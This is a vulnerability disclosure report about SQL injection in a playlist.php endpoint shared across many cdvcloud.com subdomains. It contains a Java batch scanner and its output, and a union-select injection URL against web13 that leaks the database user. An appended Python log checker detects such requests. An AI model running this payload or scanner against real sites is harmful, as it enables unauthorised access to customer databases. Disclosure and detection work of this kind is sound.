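2015-09-23: Details reported to the vendor; awaiting vendor handling
2015-09-23: Vendor confirmed; details disclosed to the vendor only
2015-10-03: Details disclosed to core white hats and experts in related fields
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to intern white hats
2015-11-07: Details disclosed to the public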
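I saw this earlier vulnerability:
WooYun: SQL injection at a 云视 endpoint leading to back-end getshell
Only web2 was fixed; the other addresses were not. So I changed the address and found that many of the subdomains host sites like this. They appear to be customers' sites that are managed centrally. So I wrote a small Java script to check them in batch: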
import java.net.*;

public class 批量查询网页打开状态 {

    public static void main(String[] args) {
        for (int i = 0; i < 100; i++) {
            String url = "http://web" + i + ".cdvcloud.com/e/extend/live/playlist.php?id=1";
            httpcode(url);
        }
    }

    /**
     * Fetch the HTTP response status for each URL in the batch.
     * @param surl URL to request
     */
    public static void httpcode(String surl) {
        try {
            URL url = new URL(surl);
            HttpURLConnection httpUrlConnection = (HttpURLConnection) url.openConnection();
            httpUrlConnection.setConnectTimeout(300000);
            httpUrlConnection.setReadTimeout(300000);
            httpUrlConnection.connect();
            // Print the status code first, then the URL together with the code.
            String code = String.valueOf(httpUrlConnection.getResponseCode());
            System.out.println(code);
            if (!code.startsWith("2")) {
                // Any non-2xx status is reported as unreachable by the catch block.
                throw new Exception("ResponseCode is not begin with 2,code=" + code);
            }
            System.out.println(surl + " " + code);
        } catch (Exception ex) {
            System.out.println(surl + " " + "无法访问");
        }
    }
}
Reachable addresses obtained:
404
http://web0.cdvcloud.com/e/extend/live/playlist.php?id=1 无法访问
404
http://web1.cdvcloud.com/e/extend/live/playlist.php?id=1 无法访问
200
http://web2.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web3.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web4.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web5.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web6.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web7.cdvcloud.com/e/extend/live/playlist.php?id=1 200
http://web8.cdvcloud.com/e/extend/live/playlist.php?id=1 无法访问
200
http://web9.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web10.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web11.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web12.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web13.cdvcloud.com/e/extend/live/playlist.php?id=1 200
200
http://web14.cdvcloud.com/e/extend/live/playlist.php?id=1 200
Taking web13 as an example, a manual injection test:
http://web13.cdvcloud.com/e/extend/live/playlist.php?id=1%20and%201=2%20union%20select%201,2,3,user(),5,6
The database information is disclosed directly:
document.write('08:00 root@localhost');
The others all have the same problem.
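A defensive check for this finding, as an added example that is not part of the original report: it scans access logs from every tenant site for requests to the playlist.php endpoint whose id parameter is not a plain integer, and lists the hosts that received them. The log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint named in the report; every tenant site shares this path.
ENDPOINT = "/e/extend/live/playlist.php"

# Constructed sample lines. Assumed format:
#   <vhost> <client> "<METHOD> <uri> HTTP/x" <status>
SAMPLE_LOG = """\
web2.cdvcloud.com 192.0.2.10 "GET /e/extend/live/playlist.php?id=1 HTTP/1.1" 200
web13.cdvcloud.com 192.0.2.44 "GET /e/extend/live/playlist.php?id=1%20and%201=2%20union%20select%201,2,3,user(),5,6 HTTP/1.1" 200
web13.cdvcloud.com 192.0.2.10 "GET /e/extend/live/playlist.php?id=27 HTTP/1.1" 200
web5.cdvcloud.com 192.0.2.44 "GET /e/extend/live/playlist.php?id=1%27 HTTP/1.1" 200
web5.cdvcloud.com 192.0.2.10 "GET /index.php?id=abc HTTP/1.1" 200
web9.cdvcloud.com 192.0.2.10 "GET /e/extend/live/playlist.php HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(\S+) (\S+) "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})$')
# Allow-list: a legitimate id is a short run of ASCII digits and nothing else.
VALID_ID = re.compile(r"[0-9]{1,10}")

def is_valid_id(value):
    """True only if the whole decoded value is a plain integer."""
    return VALID_ID.fullmatch(value) is not None

def suspicious_requests(log_text):
    """Return (vhost, client, decoded_id, status) for each non-integer id."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        vhost, client, uri, status = m.groups()
        parts = urlsplit(uri)
        if parts.path != ENDPOINT:
            continue  # other scripts are out of scope for this check
        # parse_qs percent-decodes, so %20 and %27 are compared as real characters.
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            if not is_valid_id(value):
                findings.append((vhost, client, value, int(status)))
    return findings

def affected_hosts(findings):
    """Distinct vhosts that received a non-integer id, for fleet-wide follow-up."""
    return sorted({vhost for vhost, _, _, _ in findings})

if __name__ == "__main__":
    hits = suspicious_requests(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("hosts to review:", affected_hosts(hits))
```

Because the report shows the fix reached only one of the shared deployments, the per-host listing matters: every host that serves this path needs the same patch, not just the one named in the earlier report.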
Severity: Low
Vulnerability Rank: 5
Confirmation time: 2015-09-23 16:11
Test system
None yet